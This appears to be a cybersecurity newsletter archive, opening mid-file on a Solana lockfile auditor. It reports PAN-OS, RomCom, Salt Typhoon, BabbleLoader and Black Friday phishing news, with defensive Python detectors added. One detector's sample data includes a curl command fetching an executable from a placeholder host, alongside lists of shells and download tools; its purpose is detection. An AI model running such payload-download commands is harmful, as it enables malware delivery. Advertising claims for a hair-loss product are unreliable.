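const SAMPLE_V3 = { lockfileVersion: 3, packages: {
  "": { name: "trading-bot" },
  "node_modules/@solana/web3.js": { version: "1.95.7" },
  "node_modules/some-sdk/node_modules/@solana/web3.js": { version: "1.95.8" },
}};
const SAMPLE_V1 = { lockfileVersion: 1, dependencies: {
  "@solana/web3.js": { version: "1.95.6" },
  "some-sdk": { version: "2.0.0",
    dependencies: { "@solana/web3.js": { version: "1.95.5" } } },
}};

// Usage: node audit-solana-lock.js [path/to/package-lock.json]
// Without an argument the constructed v3 sample is audited.
if (typeof require !== "undefined" && require.main === module) {
  const target = process.argv[2];
  const results = target ? auditLockFile(target) : auditLock(SAMPLE_V3);
  for (const r of results) {
    console.log(`${r.status.padEnd(11)} ${r.version.padEnd(8)} ${r.path}`);
  }
  // Non-zero exit lets a CI step fail the build on a real lockfile hit.
  if (target && results.some((r) => r.status === "compromised")) process.exitCode = 1;
}
```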


Let us know what you think.

So long and thanks for reading all the phish!


🚨 RomCom Exploits Firefox & Windows Zero-Days to Spread Malware 👾


Welcome to Gone Phishing, your daily cybersecurity newsletter that’s as popular with hackers as Keir Starmer is with the British public 🙈🙈🙈 

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to WordPress, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

Stop the WordPresses 📰 

🚨 WordPress Security Alert! ⚠️ 

Two critical vulnerabilities (CVSS 9.8) in the Spam protection, Anti-Spam, and FireWall plugin by CleanTalk could let attackers install malicious plugins and even achieve remote code execution 💥.

🔓 Vulnerabilities:

  • CVE-2024-10542: Authorization bypass via DNS spoofing 🌐

  • CVE-2024-10781: API key bypass, allowing unauthorized plugin installations 🔑

These flaws affect versions up to 6.44. The plugin is installed on 200,000+ WordPress sites 📊.

💡 Threats:

Install/activate vulnerable plugins

Execute malicious code 🐍

Redirect visitors, steal admin credentials, and inject malware 🛡️

🔥 Action Required:

Update to version 6.45 or later immediately to secure your site and block potential attacks! 🚀

Stay safe! 🌐✨

Now, on to this week’s hottest cybersecurity news stories: 

  • 💔 RomCom breaks the hearts of Firefox & Windows users 👾

  • 🌉 GLASSBRIDGE is a pro-China fake news network, says Google 🌐

  • 🦹‍♂️ Introducing HATVIBE & CHERRYSPY, the latest in Russian hackery 👨🏻‍💻

Hugh Grants them these names? 🍿🎥💘👀😉

🚨 RomCom Exploits Firefox & Windows Zero-Days to Spread Malware 👾

The Russia-linked hacker group RomCom has been caught exploiting two critical zero-day vulnerabilities to sneak its RomCom RAT backdoor into victims' systems without any clicks or interaction.

💥 The Vulnerabilities:

  • CVE-2024-9680 (🔥 9.8 CVSS) – A Firefox bug that lets hackers execute code remotely.

  • CVE-2024-49039 (⚡ 8.8 CVSS) – A flaw in Windows Task Scheduler that grants admin privileges.

🕵️ How It Works:

Hackers set up a fake website, economistjournal[.]cloud. Victims using outdated Firefox versions are automatically hit by the exploit, leading to a chain reaction:

💣 Firefox sandbox escape ➡️ Windows privilege escalation ➡️ RomCom RAT installed.

🌍 Who’s Affected? 

Mostly users in Europe and North America who unknowingly visited the booby-trapped site. 

🔐 Stay Safe:

✔️ Update Firefox & Windows now!

✔️ Watch out for suspicious websites or links.

✔️ Use strong security tools to spot weird activity.

"This zero-click exploit shows RomCom’s skill and determination to stay hidden and strike hard," warn cybersecurity experts.

Stay alert! 🛡️

The gold standard of business news

Morning Brew is transforming the way working professionals consume business news.

They skip the jargon and lengthy stories, and instead serve up the news impacting your life and career with a hint of wit and humor. This way, you’ll actually enjoy reading the news—and the information sticks.

Best part? Morning Brew’s newsletter is completely free. Sign up in just 10 seconds and if you realize that you prefer long, dense, and boring business news—you can always go back to it.

Join 4.3 Million Readers Now

Those in GLASSBRIDGEs… 😏

🚨 China-Backed Hacker Group Storm-2077 Targets U.S. Agencies 🎯

A newly identified Chinese state-sponsored threat actor, Storm-2077, is targeting U.S. government agencies and NGOs, with global attacks extending to industries like defense, aviation, telecom, and finance.

🎯 How They Attack:

💥 Exploit internet-facing devices using public vulnerabilities.

💻 Deploy Cobalt Strike and open-source malware like Pantegana and Spark RAT.

✉️ Use phishing emails to steal credentials and access sensitive data, including emails via cloud environments.

🔍 Why It Matters:

Storm-2077 isn’t just after data—it’s targeting critical infrastructure and sensitive communications that could advance espionage and sabotage efforts.

📰 Fake News Sites & Influence Operations

Meanwhile, Google flagged a pro-China propaganda network called GLASSBRIDGE, using fake news sites to spread pro-Beijing narratives.

🕵️ PR firms such as Shanghai Haixun Technology and Shenzhen Bowen Media run inauthentic news sites posing as independent outlets, and plant content on subdomains of legitimate news sites.

⚠️ What You Can Do:

✔️ Update and secure internet-facing devices.

✔️ Be vigilant about phishing emails and suspicious links.

✔️ Verify news sources, especially content on unfamiliar subdomains. 

"Storm-2077 is the latest in a long line of advanced Chinese threat actors using evolving tactics to remain undetected," warns Microsoft. Stay alert and secure! 🔐

Why struggle with file uploads? Pinata’s File API is your fix

Simplify your development workflow with Pinata’s File API. Add file uploads and retrieval to your app in minutes, without the need for complicated configurations. Pinata provides simple file management so you can focus on creating great features.

Build now!

It’s the CHERRY 🍒 on the HAT 🎩 #hatvibes 💀

🚨 Russian-Linked Hackers Launch Espionage Campaign 🌍

Threat actors tied to Russia, tracked by Recorded Future as TAG-110, are targeting government agencies, human rights organizations, and educational institutions in Central Asia, East Asia, and Europe. The cluster overlaps with UAC-0063, a group tracked by Ukraine's CERT-UA and linked to APT28 (Fancy Bear), a notorious Russian cyber-espionage crew.

🛠️ Tools of the Trade:

🎩 HATVIBE: A custom loader that delivers… 

🍒 CHERRYSPY: A Python-based backdoor used for data theft and espionage.

🎯 Target Regions:

  • Central Asia: Tajikistan, Kyrgyzstan, Kazakhstan, Turkmenistan, Uzbekistan. 

  • Other Hotspots: Armenia, China, Hungary, India, Greece, and Ukraine. 

📊 Over 62 victims across 11 countries have been identified, with a primary focus on Central Asia—likely to gather intel that supports Russia’s geopolitical ambitions.

🔍 How They Attack: 

⚙️ Exploit vulnerabilities in public-facing web apps like Rejetto HTTP File Server.

✉️ Use phishing emails to deploy HATVIBE, which then loads CHERRYSPY for spying.

🛡️ Broader Objectives:

TAG-110's actions align with Russia's ongoing strategy to:

🕵️ Gather intelligence on geopolitical developments.

🔌 Sabotage European critical infrastructure in NATO countries like Estonia, Finland, and Poland to destabilize Western alliances.

💣 Complement cyberattacks with physical sabotage as part of Russia's hybrid warfare doctrine, without directly provoking war with NATO. 

"These calculated attacks are designed to weaken NATO and maintain Russian influence in post-Soviet states," says Recorded Future. Expect increased aggression as tensions between Russia and the West continue to escalate. 🚨

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!


🚨 T-Mobile Confirms Targeting in Chinese Cyber-Espionage Campaign 🕵


Welcome to Gone Phishing, your daily cybersecurity newsletter that casts a wide old net and never pulls any punches cough Mike Tyson 🙈🥊🎣👀😁 

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to PAN-OS, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

Don’t PANic! 😏

🚨 Palo Alto Networks Alert! ⚠️

A critical zero-day vulnerability (9.3 CVSS) in PAN-OS is under active exploitation. Attackers are deploying web shells to gain unauthorised remote access through vulnerable PAN-OS firewall management interfaces 🌐.

🔎 Indicators of Compromise (IoCs), attacker source IP addresses (defanged; a trailing * means any value for that octet):

  • 136.144.17[.]*

  • 173.239.218[.]251

  • 216.73.162[.]*

👇 Immediate Actions Needed:

1. Restrict Access: Put the management interface on an isolated management network and allow only trusted internal IPs to reach it. It should never be reachable from the internet.

2. Update PAN-OS: Upgrade to the fixed build for your release train (from 10.1.14-h6 for the 10.1 train up to 11.2.4-h1 for 11.2) to resolve:

■ CVE-2024-0012 🔓 Authentication bypass on the management web interface

■ CVE-2024-9474 🚀 Privilege escalation, chained after the bypass to run commands as root

Palo Alto Networks is monitoring this as Operation Lunar Peek 👀. Remember, CISA mandates patching for Federal agencies by Dec 9.

💻 Patch now to stay protected! 🛡️
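The IoC list above is defanged and uses trailing wildcards, so a naive string search over logs misses it. The following is an added example, not code from Palo Alto Networks or from this newsletter: it turns each indicator into a CIDR block, scans access-log lines for the management interface, and separately flags any source outside a trusted management range, which is exactly what step 1 says must not happen. The log format and the "trusted" RFC 1918 ranges are assumptions; the sample lines are constructed.

```python
import ipaddress
import re

# The three indicators as printed above (defanged; a trailing "*" means "any value for that octet").
PAN_OS_IOCS = ["136.144.17[.]*", "173.239.218[.]251", "216.73.162[.]*"]

# Where management-plane logins are allowed to come from. RFC 1918 space is an assumption
# for this example; substitute your real management subnets.
TRUSTED_MGMT_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample access-log lines for a firewall management interface. This is not the
# real PAN-OS log format; the scanner only relies on the "src=<ip>" field.
SAMPLE_LOG = """\
2024-11-18T09:58:01Z src=10.10.5.23 user=admin path=/ status=200
2024-11-18T10:01:22Z src=136.144.17.77 user=- path=/ status=200
2024-11-18T10:01:23Z src=136.144.17.77 user=- path=/php/ status=404
2024-11-18T10:04:09Z src=173.239.218.251 user=- path=/ status=302
2024-11-18T10:09:40Z src=203.0.113.9 user=- path=/ status=200
2024-11-18T10:12:15Z src=216.73.162.10 user=- path=/ status=200
"""

SRC_RE = re.compile(r"\bsrc=(\d{1,3}(?:\.\d{1,3}){3})\b")


def refang(indicator: str) -> str:
    """'136.144.17[.]*' -> '136.144.17.*'."""
    return indicator.replace("[.]", ".")


def pattern_to_network(indicator: str) -> ipaddress.IPv4Network:
    """Turn a dotted pattern with trailing '*' octets into a CIDR block.

    '136.144.17.*' becomes 136.144.17.0/24 and an exact address becomes a /32,
    so matching is a plain containment test instead of string-prefix games.
    """
    octets = refang(indicator).split(".")
    if len(octets) != 4:
        raise ValueError(f"not an IPv4 pattern: {indicator!r}")
    fixed = []
    for octet in octets:
        if octet == "*":
            break
        fixed.append(octet)
    if any(o != "*" for o in octets[len(fixed):]):
        raise ValueError(f"only trailing wildcards are supported: {indicator!r}")
    base = ".".join(fixed + ["0"] * (4 - len(fixed)))
    return ipaddress.ip_network(f"{base}/{8 * len(fixed)}")


def scan_log(text: str, iocs=PAN_OS_IOCS):
    """Return (ioc_hits, untrusted_sources) for the given log text.

    ioc_hits: list of (source_ip, indicator) for every line from a known-bad range.
    untrusted_sources: sorted source IPs outside TRUSTED_MGMT_NETS; any entry here means
    the management interface is reachable from somewhere it should not be.
    """
    networks = [(ioc, pattern_to_network(ioc)) for ioc in iocs]
    ioc_hits = []
    untrusted = set()
    for line in text.splitlines():
        match = SRC_RE.search(line)
        if not match:
            continue
        ip = ipaddress.ip_address(match.group(1))
        if not any(ip in net for net in TRUSTED_MGMT_NETS):
            untrusted.add(str(ip))
        for ioc, net in networks:
            if ip in net:
                ioc_hits.append((str(ip), ioc))
                break
    return ioc_hits, sorted(untrusted)


if __name__ == "__main__":
    hits, untrusted = scan_log(SAMPLE_LOG)
    for ip, ioc in hits:
        print(f"IoC match: {ip} (indicator {ioc})")
    print("Sources outside the trusted management networks:", ", ".join(untrusted))
```

The second list matters as much as the first: 203.0.113.9 matches no indicator, but a management login from an unknown public address means the interface is exposed, and the next attacker will not come from a published IP.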

Now, on to this week’s hottest cybersecurity news stories: 

  • 🐉 Chinese hackers Salt Typhoon shake up T-Mobile w/ espionage 🕵

  • 🐍 WhiteSnake and Meduza stealers delivered via BabbleLoader 👾

  • 👨🏻‍💻 Hackers exploit Black Friday shopping frenzy w/ fake discount sites 🛒

FBI, Robot… 🤖

Salt Typhoon is T-ing up 🏌

🚨 T-Mobile Confirms Targeting in Chinese Cyber-Espionage Campaign 🕵

T-Mobile, a major U.S. telecom company, has confirmed that Chinese threat actors, Salt Typhoon (aka Earth Estries), targeted it in a months-long cyber-espionage campaign aiming to access sensitive communications from high-profile targets. This espionage effort appears focused on harvesting private data across major U.S. telecoms, including AT&T and Verizon.

Attack Details 🕵️‍♂️

Salt Typhoon, known for advanced persistence techniques, has been active since 2020 and recently intensified attacks on government and telecom sectors worldwide. 🌍

In this campaign, vulnerable software and misconfigured services were exploited to install custom backdoors and Cobalt Strike beacons, giving the attackers a foothold that blended in with normal network activity. 🚨

T-Mobile’s Response 🛡️

T-Mobile states that, so far, there’s no evidence of customer data being impacted. They are closely monitoring the situation and collaborating with authorities to prevent further breaches.

Salt Typhoon’s Tactics 🎩

Salt Typhoon’s attack strategies are known for their stealth and sophistication:

  • Access Techniques: They exploit vulnerabilities in systems like Microsoft Exchange, drop the China Chopper web shell for command execution, then use cURL from the compromised server to fetch their backdoors.

  • Credential Theft & Evasion: Tools like NinjaCopy (copies locked files such as registry hives) and PortScan (internal reconnaissance) support credential harvesting and lateral movement, while command-and-control traffic is routed through other compromised servers to hide its origin.
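The web-shell-then-cURL sequence described above has a reliable tell: a web-server worker process has no business spawning a shell, and a download tool with a remote URL should never have a web worker as an ancestor. The following is an added example, not code from Trend Micro, Microsoft or this newsletter: it runs those two rules over process-creation events (the fields Sysmon Event ID 1 or EDR telemetry provide) and walks the parent chain so the cURL launched by cmd.exe is still tied back to w3wp.exe. The process lists and the sample events are constructed for the example.

```python
import os
import re
from dataclasses import dataclass

# Web-server worker processes that have no business launching shells or download tools.
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "tomcat.exe"}
# Children that mean "command execution" or "fetch a payload" when a web worker is the ancestor.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "wget.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the fields Sysmon Event ID 1 or EDR telemetry give you)."""
    ts: str
    host: str
    pid: int
    ppid: int
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    cmdline: str


# Constructed sample events: an Exchange server with a web shell, and an unrelated workstation.
SAMPLE_EVENTS = [
    ProcEvent("2024-11-15T03:12:40Z", "exch01", 4120, 1988, r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\inetsrv\w3wp.exe", 'cmd.exe /c "whoami"'),
    ProcEvent("2024-11-15T03:12:55Z", "exch01", 4188, 1988, r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"cmd.exe /c curl.exe -s -o C:\ProgramData\svc.exe http://203.0.113.5/svc"),
    ProcEvent("2024-11-15T03:13:02Z", "exch01", 4201, 4188, r"C:\Windows\System32\curl.exe",
              r"C:\Windows\System32\cmd.exe",
              r"curl.exe -s -o C:\ProgramData\svc.exe http://203.0.113.5/svc"),
    ProcEvent("2024-11-15T08:30:00Z", "wks07", 2210, 1400, r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\explorer.exe", "cmd.exe"),
    ProcEvent("2024-11-15T09:00:00Z", "wks07", 2305, 2210, r"C:\Windows\System32\curl.exe",
              r"C:\Windows\System32\cmd.exe", "curl.exe https://intranet.corp.local/status"),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return os.path.basename(path.replace("\\", "/")).lower()


def has_web_worker_ancestor(event, by_pid, max_depth=4):
    """Walk up the parent chain on the same host and report whether a web worker sits above."""
    current = event
    for _ in range(max_depth):
        if basename(current.parent_image) in WEB_WORKERS:
            return True
        current = by_pid.get((current.host, current.ppid))
        if current is None:
            return False
    return False


def detect_web_shell_activity(events):
    """Return (host, pid, rule, detail) tuples for events that look like web-shell post-exploitation."""
    by_pid = {(e.host, e.pid): e for e in events}
    findings = []
    for e in events:
        child, parent = basename(e.image), basename(e.parent_image)
        if parent in WEB_WORKERS and (child in SHELLS or child in DOWNLOADERS):
            findings.append((e.host, e.pid, "web-shell-exec", f"{parent} spawned {child}"))
        elif child in DOWNLOADERS and has_web_worker_ancestor(e, by_pid):
            url = URL_RE.search(e.cmdline)
            if url:
                findings.append((e.host, e.pid, "web-shell-download", url.group(0)))
    return findings


if __name__ == "__main__":
    for host, pid, rule, detail in detect_web_shell_activity(SAMPLE_EVENTS):
        print(f"{host} pid={pid} {rule}: {detail}")
```

The workstation's curl call is left alone because nothing above it is a web worker; the Exchange host produces three findings, including the download URL, which is the value you would pivot on next.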

Broader Implications 🌐

The U.S. government has warned of “broad and significant” attacks on American telecom infrastructures by the PRC, stressing the severity of potential data exposure and espionage risks.

This serves as a reminder for every sector to patch internet-facing systems promptly and to monitor for the post-exploitation behaviour described above, not just for known vulnerabilities.

Novaxidil Triple Action Hair Regrowth Treatment

Novaxidil is a Premium OTC Triple Action hair loss treatment that stimulates hair regrowth, prevents further loss, AND nourishes your scalp with a combination of clinically proven ingredients: 5% Minoxidil, 2% K-Conazole, 1% Nicotinamide, Vitamin K, Biotin, and Collagen Peptides.

Our team of MD/PhD's formulated Novaxidil to maximize results while minimizing side effects.

MINOXIDIL 5%: Minoxidil is the Gold Standard for hair regrowth. It achieves this by shortening the telogen phase, extending the anagen phase, increasing blood flow to the scalp, and increasing dermal papilla cell activity.

K-CONAZOLE™ 2%: Studies have shown that K-Conazole™, a proprietary version of the popular compound, blocks the production of dihydrotestosterone (DHT), a hormone linked to male pattern baldness, as effectively as prescription alternatives like FINA without the side effects. It works by inhibiting the 5-alpha reductase (5AR) enzyme, which converts testosterone into DHT.

NICOTINAMIDE 1%: Nicotinamide, also known as niacinamide, has potent effects on hair regrowth. In studies, it has been shown to increase blood flow, and reduce inflammation to the scalp, as well as prevent premature catagen entry, and increase hair thickness. Nicotinamide works in synergy with Minoxidil, and K-Conazole™ to maximize hair regrowth, and minimize loss like no other product on the market!

Before you give up, and start rocking the "bald look," give Novaxidil a try. We're confident you won't regret it.

Learn More

Hackers: Here I go again on my own 🎶

🚨 New Malware Loader, BabbleLoader, Evades Detection with Stealthy Tactics ♟️

Cybersecurity experts have identified BabbleLoader, a highly evasive malware loader that bypasses antivirus and sandbox detection to install data-stealing malware like WhiteSnake and Meduza. Designed to slip past both traditional and ML-based defences, BabbleLoader is being deployed in multiple campaigns, targeting people searching for cracked software as well as finance and administrative professionals.

Key Features of BabbleLoader 🛡️

  • Dynamic Evasion: Every build of BabbleLoader is different. Junk code, altered control flow and changed metadata are generated per sample, so signatures built from one sample miss the next and classifiers trained on earlier builds misfire. 🧩

  • Runtime Function Resolution: Instead of importing the Windows APIs it needs, BabbleLoader resolves them at runtime, so its import table gives static scanners nothing to key on. ⚙️

  • Anti-analysis: It detects sandboxes, and its junk code and unusual control flow can crash disassemblers such as IDA and Ghidra when they try to load it, slowing analysts down.

BabbleLoader in Action 🕵️‍♂️

Once executed, BabbleLoader loads shellcode that decrypts the payload and hands control to a Donut-generated loader, which launches the final stealer (WhiteSnake or Meduza) in memory. BabbleLoader is part of a growing loader ecosystem, joining tools like Dolphin Loader and FakeBat that cybercriminals use to deliver information stealers, ransomware, and RATs (Remote Access Trojans) while skirting traditional detection.

Wider Malware Landscape 🌐

BabbleLoader’s emergence follows a series of malware findings, including LodaRAT, a RAT capable of stealing cookies, credentials, and sensitive data, recently spotted alongside Cobalt Strike and Donut loader infections. There’s also Mr.Skeleton RAT, which allows hackers to remotely control victims’ systems, manipulate files and registries, and even access webcams.

Implications for Security 🔍

As BabbleLoader and similar loaders become more common, businesses and users alike need to update and diversify defence tactics to address increasingly evasive cyber threats.

Learn AI in 5 Minutes a Day

AI Tool Report is one of the fastest-growing and most respected newsletters in the world, with over 550,000 readers from companies like OpenAI, Nvidia, Meta, Microsoft, and more.

Our research team spends hundreds of hours a week summarizing the latest news, and finding you the best opportunities to save time and earn more using AI.

Sign up with 1-Click

Hack Friday 💀 

🚨 New Phishing Campaign Targets Holiday Shoppers w/ Fake Brand Discounts 🎣 

As Black Friday approaches, a phishing campaign is preying on online shoppers in Europe and the U.S., posing as well-known brands to steal personal and financial information. The SilkSpecter group, a Chinese threat actor, has been mimicking major brands like IKEA, North Face, and Wayfair to lure users into fake discount deals on phishing sites.

How the Scam Works 🕵️‍♀️

  • Fake Discounted Products 🎁: Sites, often under TLDs such as .shop and .vip, appear to offer Black Friday deals. Victims are asked for cardholder data (CHD), sensitive authentication data (SAD) such as the CVV, and personal information (PII).

  • Geolocation Language Detection 🌎: Using Google Translate, the phishing pages change language based on visitors' regions, adding credibility.

  • Tracking Pixels 📊: Trackers like OpenReplay and TikTok Pixel monitor user activity to refine targeting.

The Payment Trap 💳

These fake sites embed Stripe to present a legitimate-looking checkout, but every card number entered is also captured by the attackers. Visitors are asked for a phone number too, which sets up follow-on smishing and vishing to extract more, such as 2FA codes.
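The traits listed above (brand name on a .shop or .vip host, Google Translate widget, OpenReplay and TikTok trackers, Stripe checkout next to a phone-number field, percentage-off Black Friday bait) are all visible in the page source, so they can be scored automatically when triaging a URL. The following is an added example, not code from EclecticIQ or this newsletter: a small feature extractor built on the standard library's HTML parser plus a scorer. The brand-to-domain list and the script fingerprints are assumptions for the example, and both sample pages are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# TLDs the write-up names. The brand list, the "real domain" per brand and the script
# fingerprints below are assumptions for this example, not data from the report.
BAIT_TLDS = {"shop", "vip"}
IMPERSONATED_BRANDS = {"ikea": "ikea.com", "northface": "thenorthface.com", "wayfair": "wayfair.com"}
TRACKER_HINTS = {"openreplay": "OpenReplay session recorder", "analytics.tiktok.com": "TikTok Pixel"}
TRANSLATE_HINT = "translate.google.com/translate_a/element.js"   # Google's website-translator widget
STRIPE_HINT = "js.stripe.com"                                     # Stripe.js checkout

# Constructed sample pages: a phishing kit impersonating IKEA, and a benign brand page.
PHISH_URL = "https://ikea-blackfriday-deals.shop/checkout"
PHISH_HTML = """<html><head>
<script src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
<script src="https://analytics.tiktok.com/i18n/pixel/events.js?sdkid=EXAMPLE"></script>
<script src="https://cdn.example-host.invalid/openreplay/tracker.js"></script>
<script src="https://js.stripe.com/v3/"></script>
</head><body>
<h1>IKEA Black Friday - 70% OFF everything</h1>
<form><input name="card_number"><input name="cvv"><input type="tel" name="phone"></form>
</body></html>"""
LEGIT_URL = "https://www.ikea.com/us/en/"
LEGIT_HTML = """<html><head><script src="https://www.ikea.com/static/app.js"></script></head>
<body><h1>Black Friday offers</h1><form><input type="email" name="email"></form></body></html>"""


class PageFeatures(HTMLParser):
    """Collect external script URLs, form inputs and visible text from an HTML document."""

    def __init__(self):
        super().__init__()
        self.scripts, self.inputs, self.text = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"].lower())
        elif tag == "input":
            self.inputs.append(((a.get("type") or "text").lower(), (a.get("name") or "").lower()))

    def handle_data(self, data):
        self.text.append(data)


def score_page(url: str, html: str):
    """Return (score, reasons); each reason is one SilkSpecter-style trait found on the page."""
    host = (urlparse(url).hostname or "").lower()
    tld = host.rsplit(".", 1)[-1]
    feats = PageFeatures()
    feats.feed(html)
    body = " ".join(feats.text).lower()
    reasons = []

    # Brand name in the hostname, but the host is not the brand's own domain.
    for brand, real_domain in IMPERSONATED_BRANDS.items():
        if brand in host.replace("-", "") and not (host == real_domain or host.endswith("." + real_domain)):
            reasons.append(f"brand '{brand}' in hostname but not on {real_domain}")
    if tld in BAIT_TLDS:
        reasons.append(f"bait TLD .{tld}")
    if any(TRANSLATE_HINT in s for s in feats.scripts):
        reasons.append("Google Translate widget (language switched per visitor region)")
    for hint, label in TRACKER_HINTS.items():
        if any(hint in s for s in feats.scripts):
            reasons.append(f"tracker: {label}")
    asks_for_phone = any(kind == "tel" or "phone" in name for kind, name in feats.inputs)
    if any(STRIPE_HINT in s for s in feats.scripts) and asks_for_phone:
        reasons.append("Stripe checkout plus phone-number field (smishing/vishing follow-up)")
    if re.search(r"black\s*friday", body) and re.search(r"\d{1,2}%\s*off", body):
        reasons.append("Black Friday percentage-off bait")
    return len(reasons), reasons


def is_likely_phish(url: str, html: str, threshold: int = 3) -> bool:
    """Three or more traits together is a strong signal; one alone (a tracker, say) is not."""
    return score_page(url, html)[0] >= threshold


if __name__ == "__main__":
    for url, html in ((PHISH_URL, PHISH_HTML), (LEGIT_URL, LEGIT_HTML)):
        score, reasons = score_page(url, html)
        print(f"{url}: score={score} phish={is_likely_phish(url, html)}")
        for reason in reasons:
            print("  -", reason)
```

No single trait is damning: real shops use Stripe and TikTok Pixel too. The scorer counts co-occurrence, and the threshold is deliberately a parameter so it can be tuned against your own false-positive rate.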

SEO Tactics and Social Media 🚀

To increase visibility, SEO poisoning tactics may push these sites to the top of search results. Attackers could also share links via social media to catch unsuspecting shoppers.

Related Black Hat Operations 🎩

Other phishing campaigns, such as Phish ‘n’ Ships, employ similar tactics, compromising real websites to list fake products. Shoppers pay, but the items never arrive.

As online shopping surges this season, shoppers should stay vigilant—verify site URLs, avoid pop-up discounts, and prioritise secure payment methods!
